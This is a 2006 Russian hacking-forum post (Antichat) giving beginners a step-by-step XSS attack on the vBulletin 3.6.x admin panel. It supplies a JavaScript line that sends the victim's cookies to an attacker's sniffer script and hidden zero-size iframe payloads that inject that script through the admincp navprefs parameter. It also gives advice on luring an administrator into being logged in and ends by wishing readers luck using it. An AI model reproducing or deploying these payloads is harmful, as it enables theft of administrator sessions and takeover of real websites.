ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Нападение XSS на Vbulletin 3.6.x для НОВИЧКОВ.
  #1  
Старый 06.11.2006, 18:07
Аватар для ReanimatoR
ReanimatoR
Участник форума
Регистрация: 27.08.2006
Сообщений: 223
Провел на форуме:
2154209

Репутация: 341
Отправить сообщение для ReanimatoR с помощью ICQ
По умолчанию Нападение XSS на Vbulletin 3.6.x для НОВИЧКОВ.

На данный момент я разобрал только одну пассивную хсс.
Вот и хочу объяснить подробнее как работать.
Один плюс. Если XSS сработала и он открыл ссылку, то мы можем залесьть в админку, так как сама ХСС находится в админке и он уже в ней...
1. Создаем на своем хостинге файл js.js(пусть будет yousite1.ru/js.js), он выглядит так:

Код:
img=new Image();img.src="http://Yoursite2.ru/cgi/sniff.cgi?"+document.cookie;
, где http://Yoursite2.ru/cgi/sniff.cgi? - ваш сниффер.

2. Вставляем в любой html файл следующий код:

Код:
<iframe src='http://site.ru/vbulletin/admincp/index.php?do=savenavprefs&nojs=0&navprefs="><script%20src=http://yousite1.ru/js.js></script>' WIDTH=0 HEIGHT=0>
Где site.ru - сайт, у который ломаем. vbulletin/admincp - =путь до админки
Теперь даем ему линк на html страницу и ждем куки=)
Примечание1.
Сессия у админа,которого вы ломаете может быть и на http://www.site.ru и на http://site.ru просто(без www), поэтому логичнее сделать сразу два варианта, то есть вставлять лучше такой код:
Код:
<iframe src='http://site.ru/vbulletin/admincp/index.php?do=savenavprefs&nojs=0&navprefs="><script%20src=http://yousite1.ru/js.js></script>' WIDTH=0 HEIGHT=0>
<iframe src='http://www.site.ru/vbulletin/admincp/index.php?do=savenavprefs&nojs=0&navprefs="><script%20src=http://yousite1.ru/js.js></script>' WIDTH=0 HEIGHT=0>
Примечание2.
yoursite и yoursite2 могут совпадать, я просто описал, чтобы не путались....

Примечание3.
Лучше всего заранее убедиться, что админ зашел в админку...Это можно сделать так:
Попросить его что-то поменять у Вас в профиле или поискать багу на сайте(кривой скин и т.д. и попросить его поменять...) Ну в общем множестве вариантов.
Удачи в использовании.

Разъясню:
----
НАПАДЕНИЕ ОСУЩЕСТВЛЯЕТСЯ ТОЛЬКО НА АДМИНИСТРАТОРА ФОРУМА(ИЛИ ТЕХ КТО ИМЕЕТ ДОСТУП В АДМИН ПАНЕЛЬ)
----
Сессия администратора должна сохраниться(это примерно минут 10-20 после последнего действия в админ панели...).

------------------------------------------------------------------

Grey: тема закрыта, все сообщения не имеющие информационной ценности удалены, ссылка на тему добавлена в тему [Обзор уязвимостей vBulletin].

Последний раз редактировалось Grey; 02.03.2007 в 17:53.. Причина: Чистка темы, объединение сообщений.
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Софт для мобильных телефонов под *nix Grrl Сотовый фрикинг 2 02.03.2007 01:47
Редактирование содежимого прошивок для Самсунгов Digimortal Схемы и программы 3 28.02.2007 14:22
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ